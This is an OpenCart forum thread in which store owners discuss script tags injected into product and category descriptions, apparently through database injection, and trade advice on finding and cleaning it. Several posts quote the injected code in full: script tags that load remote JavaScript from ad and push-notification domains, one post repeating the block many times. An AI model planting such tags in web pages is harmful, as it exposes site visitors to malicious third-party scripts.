Post by omsonic » Sat May 27, 2017 6:46 am

I know this is something to do with the SQL injection hack mentioned in other posts but I've tried all the solutions they suggest to no avail.
This is the code that keeps being inserted into my product descriptions.

Code: Select all

<script data-cfasync="false" type="text/javascript" src="//p79479.clksite.com/adServe/banners?tid=79479_127480_7&amp;tagid=2"></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&amp;interactive=1&amp;pushup=1"></script>
What the hell stops this from happening :choke: :'( !?!?!

Newbie

Posts

Joined
Sat May 27, 2017 6:32 am

Post by IP_CAM » Sun May 28, 2017 12:54 am

What the hell stops this from happening

Well, any good DEV would be able to stop this, you don't need the devil :D
If it exists, it can and will be found. I assume, the Code has been placed in
a 'hidden' manner, possibly in a BASE64 Format, so, it cannot be found by
just searching for something like javascript... , in order to find it easy.

But it may take some time. But make sure, not to allow someone UNKNOWN
admin access to your Site and data, only trust one, able to be identified, by a
Personal Site and Address as well as by a personal Site email-address.
Just to mention this, but even the OC World is full of sneekers ! ;)
Good Luck
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by sims » Sun May 28, 2017 4:12 am

" I assume, the Code has been placed in a 'hidden' manner, possibly in a BASE64 Format, so, it cannot be found by
just searching for something like javascript... , in order to find it easy."

No it isn't

There are NO alterations to ANY files in Opencart

This is a direct injection into the database - you will find it there

To the OP try https://www.getastra.com/ (no affiliation just a customer)

New member

Posts

Joined
Fri Apr 21, 2017 11:49 pm

Post by IP_CAM » Sun May 28, 2017 6:43 am

well, then, one has to check for such in the database as well...
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by MrPhil » Sun May 28, 2017 8:43 am

Assuming it's lurking in the database, possibly in some common area (not product-specific), you'll have to do quite a bit of searching in all text fields. Not only could it be a clear string like pub2srv, but it might be encoded in some manner, and the code to decode it might contain strings like "base64", "encode", "decode", etc. That might also be in PHP code, but you say you've thoroughly checked it (actually compared against a fresh version, or a known-good backup?). I don't know if there's any place in OC where PHP code is stored in the database (rather than a file), but it's quite possible that HTML containing Javascript has been inserted into the database, and that JS might in turn be decoding the actual text you see.

Once you've found the source and cleaned it up, please report back where it was, and any evidence of how it got there. It will be of great interest to OC developers if the attack was conducted through something in OC itself (e.g., SQL injection), that needs to be fixed immediately, as opposed to something where the attacker got in as a result of site owner carelessness or a hosting security breach (document and caution store owners, but no code fixes needed).

User avatar
Active Member

Posts

Joined
Wed May 10, 2017 11:52 pm

Post by sims » Sun May 28, 2017 9:58 pm

It is not encoded.

It is always inserted in the Description field (every record)

2 tables are affected: category_description and product_description

You can clearly see the code in Phpmyadmin / MySQL workbench

Here is what was put in:

Code: Select all

<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script>

New member

Posts

Joined
Fri Apr 21, 2017 11:49 pm
Who is online

Users browsing this forum: No registered users and 28 guests